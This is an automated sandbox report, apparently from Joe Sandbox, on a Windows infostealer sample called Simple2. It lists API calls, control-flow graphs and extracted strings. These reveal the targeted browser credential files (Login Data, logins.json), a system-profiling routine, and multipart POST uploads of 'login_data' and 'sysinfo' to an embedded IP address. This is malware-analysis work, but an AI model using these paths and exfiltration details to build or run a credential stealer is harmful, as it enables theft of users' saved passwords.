              • WinHttpQueryHeaders.WINHTTP ref: 00007FF6D5CA33BF
              • GetLastError.KERNEL32 ref: 00007FF6D5CA361C
                • Part of subcall function 00007FF6D5CA94E0: ?sputc@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QEAAHD@Z.MSVCP140(?,00000000,00000000,?,00007FF6D5CA1970), ref: 00007FF6D5CA95D6
              • GetLastError.KERNEL32 ref: 00007FF6D5CA3414
                • Part of subcall function 00007FF6D5CA94E0: ?good@ios_base@std@@QEBA_NXZ.MSVCP140(?,?,00000000,00000000,?,00007FF6D5CA1970), ref: 00007FF6D5CA9559
                • Part of subcall function 00007FF6D5CA94E0: ?flush@?$basic_ostream@_WU?$char_traits@_W@std@@@std@@QEAAAEAV12@XZ.MSVCP140(?,00000000,00000000,?,00007FF6D5CA1970), ref: 00007FF6D5CA9579
                • Part of subcall function 00007FF6D5CA94E0: ?good@ios_base@std@@QEBA_NXZ.MSVCP140(?,00000000,00000000,?,00007FF6D5CA1970), ref: 00007FF6D5CA9589
                • Part of subcall function 00007FF6D5CA94E0: ?setstate@?$basic_ios@_WU?$char_traits@_W@std@@@std@@QEAAXH_N@Z.MSVCP140(?,00000000,00000000,?,00007FF6D5CA1970), ref: 00007FF6D5CA9664
                • Part of subcall function 00007FF6D5CA94E0: ?uncaught_exception@std@@YA_NXZ.MSVCP140(?,00000000,00000000,?,00007FF6D5CA1970), ref: 00007FF6D5CA966B
                • Part of subcall function 00007FF6D5CA94E0: ?_Osfx@?$basic_ostream@_WU?$char_traits@_W@std@@@std@@QEAAXXZ.MSVCP140(?,00000000,00000000,?,00007FF6D5CA1970), ref: 00007FF6D5CA9678
              • ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@K@Z.MSVCP140 ref: 00007FF6D5CA3434
              • ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z.MSVCP140 ref: 00007FF6D5CA3444
              • WinHttpCloseHandle.WINHTTP ref: 00007FF6D5CA344D
              • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF6D5CA348C
              • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF6D5CA34DA
              • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF6D5CA3522
              • WinHttpCloseHandle.WINHTTP ref: 00007FF6D5CA3541
              • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF6D5CA3589
              • GetLastError.KERNEL32 ref: 00007FF6D5CA3590
              • ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@K@Z.MSVCP140 ref: 00007FF6D5CA35B0
              • ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z.MSVCP140 ref: 00007FF6D5CA35C0
              • WinHttpCloseHandle.WINHTTP ref: 00007FF6D5CA35D3
              • GetLastError.KERNEL32 ref: 00007FF6D5CA35DB
              • ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@K@Z.MSVCP140 ref: 00007FF6D5CA35FB
              • ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z.MSVCP140 ref: 00007FF6D5CA360B
              • WinHttpCloseHandle.WINHTTP ref: 00007FF6D5CA3614
              • ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@K@Z.MSVCP140 ref: 00007FF6D5CA363C
              • Concurrency::cancel_current_task.LIBCPMT ref: 00007FF6D5CA3703
                • Part of subcall function 00007FF6D5CA1270: __std_exception_copy.VCRUNTIME140(?,?,?,?,?,?,?,?,?,?,?,?,00007FF6D5CAB1C3), ref: 00007FF6D5CA12B4
              • ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z.MSVCP140 ref: 00007FF6D5CA364C
                • Part of subcall function 00007FF6D5CA1310: ?_Xlength_error@std@@YAXPEBD@Z.MSVCP140 ref: 00007FF6D5CA131B
              • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF6D5CA367E
              • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF6D5CA36C6
                • Part of subcall function 00007FF6D5CA9BB0: memcpy.VCRUNTIME140 ref: 00007FF6D5CA9BE8
              • Concurrency::cancel_current_task.LIBCPMT ref: 00007FF6D5CA3709
              • Concurrency::cancel_current_task.LIBCPMT ref: 00007FF6D5CA370F
                • Part of subcall function 00007FF6D5CAA6C0: memcpy.VCRUNTIME140 ref: 00007FF6D5CAA787
              • Concurrency::cancel_current_task.LIBCPMT ref: 00007FF6D5CA3721
              • Concurrency::cancel_current_task.LIBCPMT ref: 00007FF6D5CA3727
              • Concurrency::cancel_current_task.LIBCPMT ref: 00007FF6D5CA3733
              • ??1?$basic_iostream@DU?$char_traits@D@std@@@std@@UEAA@XZ.MSVCP140 ref: 00007FF6D5CA3786
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.2360525446.00007FF6D5CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6D5CA0000, based on PE: true
              • Associated: 00000000.00000002.2360505710.00007FF6D5CA0000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2360578068.00007FF6D5CAD000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2360595538.00007FF6D5CB4000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2360616047.00007FF6D5CB5000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_7ff6d5ca0000_Simple2.jbxd
              Similarity
              • API ID: _invalid_parameter_noinfo_noreturn$V01@$U?$char_traits@$D@std@@@std@@$??6?$basic_ostream@$Httpmemcpy$Concurrency::cancel_current_task$V01@@$CloseErrorHandleLast$U?$char_traits@_W@std@@@std@@$?good@ios_base@std@@OpenRequest$??0?$basic_ios@??0?$basic_ostream@??0?$basic_streambuf@??1?$basic_iostream@?flush@?$basic_ostream@_?setstate@?$basic_ios@_?setw@std@@?sputc@?$basic_streambuf@?uncaught_exception@std@@AttributesConnectD@std@@@1@_FileHeadersJ@1@_Osfx@?$basic_ostream@_QueryReceiveResponseSendSmanip@_U?$_V12@V21@@V?$basic_streambuf@Vios_base@1@Xlength_error@std@@__std_exception_copyisalnummallocmemcmp
              • String ID: $" }$", "ip": "$"; filename="login_data$--WebKitFormBoundary$.json"$.sqlite"$/userdata$Content-Disposition: form-data; name="sysinfo"$Content-Type: application/json$Content-Type: application/x-sqlite3$Content-Type: multipart/form-data; boundary=WebKitFormBoundary$File is found: $File not found: $FileData is empty$POST$WinHTTP/1.0$brave$chrome$chromebeta$chromium$chromium$chromium$firefox$fo": "$msedge$name="$opera$operagx$yandex
              • API String ID: 1510262236-3911588127
              • Opcode ID: 871ca3fa71478082454e6d8cc9e4da38c7709993002661c517f638460a39822b
              • Instruction ID: 8664b5c63edcbb028369f4c6256916e9eed7ec43d9bdea99416a16d27c9accfa
              • Opcode Fuzzy Hash: 871ca3fa71478082454e6d8cc9e4da38c7709993002661c517f638460a39822b
              • Instruction Fuzzy Hash: A3F29163A18B8685EB108B65D8447ED2B71FB45BD4F40423ADE6D87ED5EF78E9A0C300

              Control-flow Graph

              • Executed
              • Not Executed
              control_flow_graph 501 7ff6d5ca5540-7ff6d5ca55dd GetConsoleWindow ShowWindow call 7ff6d5ca9260 call 7ff6d5ca41f0 call 7ff6d5ca7f40 508 7ff6d5ca55df-7ff6d5ca55f1 501->508 509 7ff6d5ca5614-7ff6d5ca564b call 7ff6d5ca9260 call 7ff6d5ca3e70 call 7ff6d5ca7f40 501->509 510 7ff6d5ca560f call 7ff6d5cab180 508->510 511 7ff6d5ca55f3-7ff6d5ca5606 508->511 520 7ff6d5ca5682-7ff6d5ca57a6 call 7ff6d5ca9260 GetSystemInfo memset call 7ff6d5ca6390 call 7ff6d5ca94e0 ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@G@Z call 7ff6d5ca94e0 * 2 ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@K@Z call 7ff6d5ca94e0 call 7ff6d5ca8760 call 7ff6d5ca7790 ??1?$basic_iostream@DU?$char_traits@D@std@@@std@@UEAA@XZ ??1?$basic_ios@DU?$char_traits@D@std@@@std@@UEAA@XZ call 7ff6d5ca7f40 509->520 521 7ff6d5ca564d-7ff6d5ca565f 509->521 510->509 511->510 513 7ff6d5ca5608-7ff6d5ca560e _invalid_parameter_noinfo_noreturn 511->513 513->510 544 7ff6d5ca57a8-7ff6d5ca57ba 520->544 545 7ff6d5ca57dd-7ff6d5ca58da call 7ff6d5ca9260 GlobalMemoryStatusEx memset call 7ff6d5ca6390 call 7ff6d5ca94e0 ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@_K@Z call 7ff6d5ca94e0 call 7ff6d5ca8760 call 7ff6d5ca7790 ??1?$basic_iostream@DU?$char_traits@D@std@@@std@@UEAA@XZ ??1?$basic_ios@DU?$char_traits@D@std@@@std@@UEAA@XZ call 7ff6d5ca7f40 520->545 523 7ff6d5ca5661-7ff6d5ca5674 521->523 524 7ff6d5ca567d call 7ff6d5cab180 521->524 523->524 525 7ff6d5ca5676-7ff6d5ca567c _invalid_parameter_noinfo_noreturn 523->525 524->520 525->524 546 7ff6d5ca57d8 call 7ff6d5cab180 544->546 547 7ff6d5ca57bc-7ff6d5ca57cf 544->547 564 7ff6d5ca5911-7ff6d5ca5948 call 7ff6d5ca9260 call 7ff6d5ca37a0 call 7ff6d5ca7f40 545->564 565 7ff6d5ca58dc-7ff6d5ca58ee 545->565 546->545 547->546 549 7ff6d5ca57d1-7ff6d5ca57d7 _invalid_parameter_noinfo_noreturn 547->549 549->546 576 7ff6d5ca597f-7ff6d5ca59db call 7ff6d5ca9260 malloc memset call 7ff6d5ca6390 GetAdaptersInfo 564->576 577 7ff6d5ca594a-7ff6d5ca595c 564->577 567 7ff6d5ca58f0-7ff6d5ca5903 565->567 568 7ff6d5ca590c call 7ff6d5cab180 565->568 567->568 570 7ff6d5ca5905-7ff6d5ca590b _invalid_parameter_noinfo_noreturn 567->570 568->564 570->568 586 7ff6d5ca59e9-7ff6d5ca59f8 GetAdaptersInfo 576->586 587 7ff6d5ca59dd-7ff6d5ca59e6 malloc 576->587 578 7ff6d5ca595e-7ff6d5ca5971 577->578 579 7ff6d5ca597a call 7ff6d5cab180 577->579 578->579 581 7ff6d5ca5973-7ff6d5ca5979 _invalid_parameter_noinfo_noreturn 578->581 579->576 581->579 588 7ff6d5ca5a6e-7ff6d5ca5a71 586->588 589 7ff6d5ca59fa-7ff6d5ca5a00 586->589 587->586 590 7ff6d5ca5a73-7ff6d5ca5a76 free 588->590 591 7ff6d5ca5a7c-7ff6d5ca5af8 call 7ff6d5ca8760 call 7ff6d5ca7790 ??1?$basic_iostream@DU?$char_traits@D@std@@@std@@UEAA@XZ ??1?$basic_ios@DU?$char_traits@D@std@@@std@@UEAA@XZ call 7ff6d5ca7f40 588->591 589->591 592 7ff6d5ca5a02-7ff6d5ca5a6a call 7ff6d5ca94e0 * 6 589->592 590->591 605 7ff6d5ca5b2f-7ff6d5ca5b51 call 7ff6d5ca4570 591->605 606 7ff6d5ca5afa-7ff6d5ca5b0c 591->606 629 7ff6d5ca5a6c 592->629 616 7ff6d5ca637f-7ff6d5ca6384 call 7ff6d5ca1310 605->616 617 7ff6d5ca5b57-7ff6d5ca5b87 605->617 609 7ff6d5ca5b0e-7ff6d5ca5b21 606->609 610 7ff6d5ca5b2a call 7ff6d5cab180 606->610 609->610 613 7ff6d5ca5b23-7ff6d5ca5b29 _invalid_parameter_noinfo_noreturn 609->613 610->605 613->610 628 7ff6d5ca6385-7ff6d5ca638a call 7ff6d5ca1270 616->628 619 7ff6d5ca5c04-7ff6d5ca5c8f memcpy call 7ff6d5ca9260 call 7ff6d5ca7f40 617->619 620 7ff6d5ca5b89-7ff6d5ca5b93 617->620 645 7ff6d5ca5c91-7ff6d5ca5ca3 619->645 646 7ff6d5ca5cc7-7ff6d5ca5cd0 619->646 624 7ff6d5ca5bc5-7ff6d5ca5bdc 620->624 625 7ff6d5ca5b95-7ff6d5ca5ba2 620->625 632 7ff6d5ca5bde-7ff6d5ca5be5 624->632 633 7ff6d5ca5bed-7ff6d5ca5bf0 624->633 631 7ff6d5ca5ba6-7ff6d5ca5bb1 call 7ff6d5cab188 625->631 629->590 647 7ff6d5ca5bb7-7ff6d5ca5bc3 631->647 648 7ff6d5ca5cfb-7ff6d5ca5d01 _invalid_parameter_noinfo_noreturn 631->648 632->628 637 7ff6d5ca5beb 632->637 638 7ff6d5ca5bf2-7ff6d5ca5bfa call 7ff6d5cab188 633->638 639 7ff6d5ca5bfc 633->639 637->631 640 7ff6d5ca5bff 638->640 639->640 640->619 651 7ff6d5ca5cc1-7ff6d5ca5cc6 call 7ff6d5cab180 645->651 652 7ff6d5ca5ca5-7ff6d5ca5cb8 645->652 653 7ff6d5ca5cd2-7ff6d5ca5ce4 646->653 654 7ff6d5ca5d07-7ff6d5ca5d3e call 7ff6d5ca9260 call 7ff6d5ca3a40 call 7ff6d5ca7f40 646->654 647->640 650 7ff6d5ca5d02 call 7ff6d5cab180 648->650 650->654 651->646 652->651 657 7ff6d5ca5cba-7ff6d5ca5cc0 _invalid_parameter_noinfo_noreturn 652->657 653->650 659 7ff6d5ca5ce6-7ff6d5ca5cf9 653->659 666 7ff6d5ca5d40-7ff6d5ca5d52 654->666 667 7ff6d5ca5d75-7ff6d5ca5dc4 call 7ff6d5ca9260 memset call 7ff6d5ca6390 NetGetJoinInformation 654->667 657->651 659->648 659->650 669 7ff6d5ca5d70 call 7ff6d5cab180 666->669 670 7ff6d5ca5d54-7ff6d5ca5d67 666->670 676 7ff6d5ca5e8a-7ff6d5ca5f06 call 7ff6d5ca8760 call 7ff6d5ca7790 ??1?$basic_iostream@DU?$char_traits@D@std@@@std@@UEAA@XZ ??1?$basic_ios@DU?$char_traits@D@std@@@std@@UEAA@XZ call 7ff6d5ca7f40 667->676 677 7ff6d5ca5dca-7ff6d5ca5dd6 667->677 669->667 670->669 672 7ff6d5ca5d69-7ff6d5ca5d6f _invalid_parameter_noinfo_noreturn 670->672 672->669 693 7ff6d5ca5f08-7ff6d5ca5f1a 676->693 694 7ff6d5ca5f3d-7ff6d5ca5f74 GetTimeZoneInformation memset call 7ff6d5ca6390 676->694 678 7ff6d5ca5dd8 677->678 679 7ff6d5ca5deb-7ff6d5ca5e40 call 7ff6d5ca8830 call 7ff6d5ca94e0 call 7ff6d5caaed0 call 7ff6d5ca94e0 677->679 681 7ff6d5ca5de0-7ff6d5ca5de9 678->681 703 7ff6d5ca5e42-7ff6d5ca5e54 679->703 704 7ff6d5ca5e77-7ff6d5ca5e85 679->704 681->679 681->681 697 7ff6d5ca5f38 call 7ff6d5cab180 693->697 698 7ff6d5ca5f1c-7ff6d5ca5f2f 693->698 705 7ff6d5ca5f76 694->705 706 7ff6d5ca5f8b-7ff6d5ca5fe4 call 7ff6d5ca8830 call 7ff6d5ca94e0 call 7ff6d5caaed0 call 7ff6d5ca94e0 694->706 697->694 698->697 702 7ff6d5ca5f31-7ff6d5ca5f37 _invalid_parameter_noinfo_noreturn 698->702 702->697 707 7ff6d5ca5e72 call 7ff6d5cab180 703->707 708 7ff6d5ca5e56-7ff6d5ca5e69 703->708 704->676 709 7ff6d5ca5f80-7ff6d5ca5f89 705->709 720 7ff6d5ca5fe6-7ff6d5ca5ff8 706->720 721 7ff6d5ca601b-7ff6d5ca6095 call 7ff6d5ca8760 call 7ff6d5ca7790 ??1?$basic_iostream@DU?$char_traits@D@std@@@std@@UEAA@XZ ??1?$basic_ios@DU?$char_traits@D@std@@@std@@UEAA@XZ call 7ff6d5ca7f40 706->721 707->704 708->707 711 7ff6d5ca5e6b-7ff6d5ca5e71 _invalid_parameter_noinfo_noreturn 708->711 709->706 709->709 711->707 722 7ff6d5ca6016 call 7ff6d5cab180 720->722 723 7ff6d5ca5ffa-7ff6d5ca600d 720->723 732 7ff6d5ca6097-7ff6d5ca60a9 721->732 733 7ff6d5ca60cc-7ff6d5ca6191 memset call 7ff6d5ca6390 GetModuleFileNameA call 7ff6d5ca94e0 * 3 call 7ff6d5ca8760 call 7ff6d5ca7790 ??1?$basic_iostream@DU?$char_traits@D@std@@@std@@UEAA@XZ ??1?$basic_ios@DU?$char_traits@D@std@@@std@@UEAA@XZ call 7ff6d5ca7f40 721->733 722->721 723->722 725 7ff6d5ca600f-7ff6d5ca6015 _invalid_parameter_noinfo_noreturn 723->725 725->722 735 7ff6d5ca60c7 call 7ff6d5cab180 732->735 736 7ff6d5ca60ab-7ff6d5ca60be 732->736 752 7ff6d5ca6193-7ff6d5ca61a5 733->752 753 7ff6d5ca61c8-7ff6d5ca61ff call 7ff6d5ca9260 call 7ff6d5ca3c40 call 7ff6d5ca7f40 733->753 735->733 736->735 739 7ff6d5ca60c0-7ff6d5ca60c6 _invalid_parameter_noinfo_noreturn 736->739 739->735 754 7ff6d5ca61c3 call 7ff6d5cab180 752->754 755 7ff6d5ca61a7-7ff6d5ca61ba 752->755 764 7ff6d5ca6201-7ff6d5ca6213 753->764 765 7ff6d5ca6236-7ff6d5ca626a call 7ff6d5ca4cb0 call 7ff6d5ca1ac0 753->765 754->753 755->754 757 7ff6d5ca61bc-7ff6d5ca61c2 _invalid_parameter_noinfo_noreturn 755->757 757->754 767 7ff6d5ca6231 call 7ff6d5cab180 764->767 768 7ff6d5ca6215-7ff6d5ca6228 764->768 773 7ff6d5ca626f-7ff6d5ca6277 765->773 767->765 768->767 771 7ff6d5ca622a-7ff6d5ca6230 _invalid_parameter_noinfo_noreturn 768->771 771->767 774 7ff6d5ca62c1-7ff6d5ca62c9 773->774 775 7ff6d5ca6279-7ff6d5ca629a call 7ff6d5ca9cb0 773->775 777 7ff6d5ca62ff-7ff6d5ca6317 774->777 778 7ff6d5ca62cb-7ff6d5ca62dc 774->778 788 7ff6d5ca62b8-7ff6d5ca62c0 call 7ff6d5cab180 775->788 789 7ff6d5ca629c-7ff6d5ca62af 775->789 781 7ff6d5ca6319-7ff6d5ca632a 777->781 782 7ff6d5ca634d-7ff6d5ca637e call 7ff6d5cab160 777->782 779 7ff6d5ca62de-7ff6d5ca62f1 778->779 780 7ff6d5ca62fa call 7ff6d5cab180 778->780 779->780 784 7ff6d5ca62f3-7ff6d5ca62f9 _invalid_parameter_noinfo_noreturn 779->784 780->777 786 7ff6d5ca6348 call 7ff6d5cab180 781->786 787 7ff6d5ca632c-7ff6d5ca633f 781->787 784->780 786->782 787->786 791 7ff6d5ca6341-7ff6d5ca6347 _invalid_parameter_noinfo_noreturn 787->791 788->774 789->788 793 7ff6d5ca62b1-7ff6d5ca62b7 _invalid_parameter_noinfo_noreturn 789->793 791->786 793->788
              APIs
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.2360525446.00007FF6D5CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6D5CA0000, based on PE: true
              • Associated: 00000000.00000002.2360505710.00007FF6D5CA0000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2360578068.00007FF6D5CAD000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2360595538.00007FF6D5CB4000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2360616047.00007FF6D5CB5000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_7ff6d5ca0000_Simple2.jbxd
              Similarity
              • API ID: _invalid_parameter_noinfo_noreturn$D@std@@@std@@U?$char_traits@$memset$??1?$basic_ios@??1?$basic_iostream@$??6?$basic_ostream@Infomemcpy$AdaptersInformationOpenV01@ValueWindowmalloc$CloseConcurrency::cancel_current_taskConsoleFileGlobalJoinMemoryModuleNameShowStatusSystemTimeV01@_Xlength_error@std@@Zonefree
              • String ID: ADAPTERS INFO:$CPU INFO:$DISK INFO:$DOMAIN AND TZ INFO:$LOCALE INFO:$PROCESSES RUNNING:$RAM INFO:$USERS INFO:$ IP: $ MB$185.237.165.97$@$Adapter: $Domain: $Executable Path: $IP Address: $MACHINE INFO:$Number of Cores: $Processor Architecture: $Time Zone: $Total Physical Memory:
              • API String ID: 1449153876-4066422610
              • Opcode ID: 9efb709899f569bd117ccf221bef8b43f8760c8e4a6dedd705c6b581c116ab68
              • Instruction ID: b316c69c939bc3e83bfaac6593fbdd469bd26924b3de283211584c145af7a60a
              • Opcode Fuzzy Hash: 9efb709899f569bd117ccf221bef8b43f8760c8e4a6dedd705c6b581c116ab68
              • Instruction Fuzzy Hash: 5F82A163B08A8695EB10DB64D444AED2B70FB44BD8F40423BDE6D86ED9EE6CD995C300

              Control-flow Graph

              • Executed
              • Not Executed
              control_flow_graph 797 7ff6d5ca4cb0-7ff6d5ca4cfa malloc 798 7ff6d5ca4d0c-7ff6d5ca4d70 GetEnvironmentVariableW call 7ff6d5ca7df0 free call 7ff6d5ca9910 call 7ff6d5ca4800 797->798 799 7ff6d5ca4cfc-7ff6d5ca4d07 797->799 809 7ff6d5ca4d72-7ff6d5ca4d89 798->809 810 7ff6d5ca4dac-7ff6d5ca4de8 call 7ff6d5ca9910 call 7ff6d5ca4800 798->810 800 7ff6d5ca5509-7ff6d5ca5532 call 7ff6d5cab160 799->800 812 7ff6d5ca4da7 call 7ff6d5cab180 809->812 813 7ff6d5ca4d8b-7ff6d5ca4d9e 809->813 818 7ff6d5ca4ded-7ff6d5ca4df9 810->818 812->810 813->812 816 7ff6d5ca4da0-7ff6d5ca4da6 _invalid_parameter_noinfo_noreturn 813->816 816->812 819 7ff6d5ca4e37-7ff6d5ca4f97 call 7ff6d5ca9910 * 8 call 7ff6d5ca8d10 call 7ff6d5ca9910 call 7ff6d5caa8d0 818->819 820 7ff6d5ca4dfb-7ff6d5ca4e14 818->820 847 7ff6d5ca4fd4-7ff6d5ca4fee call 7ff6d5caa4f0 819->847 848 7ff6d5ca4f99-7ff6d5ca4fd2 memcpy 819->848 821 7ff6d5ca4e32 call 7ff6d5cab180 820->821 822 7ff6d5ca4e16-7ff6d5ca4e29 820->822 821->819 822->821 824 7ff6d5ca4e2b-7ff6d5ca4e31 _invalid_parameter_noinfo_noreturn 822->824 824->821 849 7ff6d5ca4ff3-7ff6d5ca5096 call 7ff6d5ca8d10 call 7ff6d5ca9910 call 7ff6d5caa8d0 847->849 848->849 857 7ff6d5ca50d3-7ff6d5ca50ed call 7ff6d5caa4f0 849->857 858 7ff6d5ca5098-7ff6d5ca50d1 memcpy 849->858 859 7ff6d5ca50f2-7ff6d5ca519d call 7ff6d5cab188 857->859 858->859 863 7ff6d5ca51a0-7ff6d5ca51c4 call 7ff6d5ca9130 859->863 866 7ff6d5ca51c6-7ff6d5ca51fb call 7ff6d5ca9cb0 call 7ff6d5cab1c4 863->866 871 7ff6d5ca5237-7ff6d5ca5253 866->871 872 7ff6d5ca51fd-7ff6d5ca5214 866->872 873 7ff6d5ca528e-7ff6d5ca52a8 871->873 874 7ff6d5ca5255-7ff6d5ca526b 871->874 875 7ff6d5ca5232 call 7ff6d5cab180 872->875 876 7ff6d5ca5216-7ff6d5ca5229 872->876 879 7ff6d5ca52e4-7ff6d5ca52ed 873->879 880 7ff6d5ca52aa-7ff6d5ca52c0 873->880 877 7ff6d5ca5289 call 7ff6d5cab180 874->877 878 7ff6d5ca526d-7ff6d5ca5280 874->878 875->871 876->875 881 7ff6d5ca522b-7ff6d5ca5231 _invalid_parameter_noinfo_noreturn 876->881 877->873 878->877 883 7ff6d5ca5282-7ff6d5ca5288 _invalid_parameter_noinfo_noreturn 878->883 887 7ff6d5ca52ef-7ff6d5ca5306 879->887 888 7ff6d5ca5329-7ff6d5ca5345 879->888 885 7ff6d5ca52de-7ff6d5ca52e3 call 7ff6d5cab180 880->885 886 7ff6d5ca52c2-7ff6d5ca52d5 880->886 881->875 883->877 885->879 886->885 891 7ff6d5ca52d7-7ff6d5ca52dd _invalid_parameter_noinfo_noreturn 886->891 893 7ff6d5ca5324 call 7ff6d5cab180 887->893 894 7ff6d5ca5308-7ff6d5ca531b 887->894 889 7ff6d5ca5380-7ff6d5ca539a 888->889 890 7ff6d5ca5347-7ff6d5ca535d 888->890 898 7ff6d5ca53d5-7ff6d5ca5415 889->898 899 7ff6d5ca539c-7ff6d5ca53b2 889->899 896 7ff6d5ca535f-7ff6d5ca5372 890->896 897 7ff6d5ca537b call 7ff6d5cab180 890->897 891->885 893->888 894->893 901 7ff6d5ca531d-7ff6d5ca5323 _invalid_parameter_noinfo_noreturn 894->901 896->897 902 7ff6d5ca5374-7ff6d5ca537a _invalid_parameter_noinfo_noreturn 896->902 897->889 906 7ff6d5ca544e-7ff6d5ca5470 898->906 907 7ff6d5ca5417-7ff6d5ca542b 898->907 904 7ff6d5ca53d0 call 7ff6d5cab180 899->904 905 7ff6d5ca53b4-7ff6d5ca53c7 899->905 901->893 902->897 904->898 905->904 912 7ff6d5ca53c9-7ff6d5ca53cf _invalid_parameter_noinfo_noreturn 905->912 910 7ff6d5ca5472-7ff6d5ca5486 906->910 911 7ff6d5ca54a9-7ff6d5ca54cb 906->911 908 7ff6d5ca5449 call 7ff6d5cab180 907->908 909 7ff6d5ca542d-7ff6d5ca5440 907->909 908->906 909->908 914 7ff6d5ca5442-7ff6d5ca5448 _invalid_parameter_noinfo_noreturn 909->914 916 7ff6d5ca54a4 call 7ff6d5cab180 910->916 917 7ff6d5ca5488-7ff6d5ca549b 910->917 911->800 918 7ff6d5ca54cd-7ff6d5ca54e6 911->918 912->904 914->908 916->911 917->916 919 7ff6d5ca549d-7ff6d5ca54a3 _invalid_parameter_noinfo_noreturn 917->919 921 7ff6d5ca5504 call 7ff6d5cab180 918->921 922 7ff6d5ca54e8-7ff6d5ca54fb 918->922 919->916 921->800 922->921 923 7ff6d5ca54fd-7ff6d5ca5503 _invalid_parameter_noinfo_noreturn 922->923 923->921
              APIs
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.2360525446.00007FF6D5CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6D5CA0000, based on PE: true
              • Associated: 00000000.00000002.2360505710.00007FF6D5CA0000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2360578068.00007FF6D5CAD000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2360595538.00007FF6D5CB4000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2360616047.00007FF6D5CB5000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_7ff6d5ca0000_Simple2.jbxd
              Similarity
              • API ID: _invalid_parameter_noinfo_noreturn$EnvironmentVariablefreemalloc
              • String ID: USERPROFILE$\AppData\Local\BraveSoftware\Brave-Browser\User Data\Default\Login Data$\AppData\Local\Chromium\User Data\Default\Login Data$\AppData\Local\Google\Chrome Beta\User Data\Default\Login Data$\AppData\Local\Google\Chrome\User Data\Default\Login Data$\AppData\Local\Microsoft\Edge\User Data\Default\Login Data$\AppData\Local\Yandex\YandexBrowser\User Data\Default\Login Data$\AppData\Roaming\Mozilla\Firefox\Profiles$\AppData\Roaming\Mozilla\Firefox\Profiles\$\AppData\Roaming\Opera Software\Opera GX Stable\Login Data$\AppData\Roaming\Opera Software\Opera Stable\Login Data$\logins.json$\times.json$default$release
              • API String ID: 716798019-3135576060
              • Opcode ID: 38e710fdf7d203c3d4c2780963b03db702098f7aa73b3f78d3aa78e78f218211
              • Instruction ID: 65f4b4ef44e2bb6f32be530643b1a50ad024e66cf1fabf90698f9077be257893
              • Opcode Fuzzy Hash: 38e710fdf7d203c3d4c2780963b03db702098f7aa73b3f78d3aa78e78f218211
              • Instruction Fuzzy Hash: F832AD73A14BC695EB208F64E8447EC2771FB84B98F405237DA5C96E99EF78DA90C340

              Control-flow Graph

              APIs
              • memset.VCRUNTIME140(?), ref: 00007FF6D5CA423F
              • memset.VCRUNTIME140(?), ref: 00007FF6D5CA4253
              • memset.VCRUNTIME140(?), ref: 00007FF6D5CA4267
              • memset.VCRUNTIME140(?), ref: 00007FF6D5CA427B
              • memset.VCRUNTIME140(?), ref: 00007FF6D5CA428D
                • Part of subcall function 00007FF6D5CA6390: ??0?$basic_ios@DU?$char_traits@D@std@@@std@@IEAA@XZ.MSVCP140 ref: 00007FF6D5CA63CA
                • Part of subcall function 00007FF6D5CA6390: ??0?$basic_iostream@DU?$char_traits@D@std@@@std@@QEAA@PEAV?$basic_streambuf@DU?$char_traits@D@std@@@1@@Z.MSVCP140 ref: 00007FF6D5CA63E6
                • Part of subcall function 00007FF6D5CA6390: ??0?$basic_streambuf@DU?$char_traits@D@std@@@std@@IEAA@XZ.MSVCP140 ref: 00007FF6D5CA6418
              • RegOpenKeyExA.KERNELBASE(?), ref: 00007FF6D5CA42BE
              • RegGetValueA.KERNELBASE ref: 00007FF6D5CA42F2
              • RegCloseKey.KERNELBASE ref: 00007FF6D5CA432D
              • RegOpenKeyExA.KERNELBASE ref: 00007FF6D5CA435C
              • RegGetValueA.KERNELBASE ref: 00007FF6D5CA4395
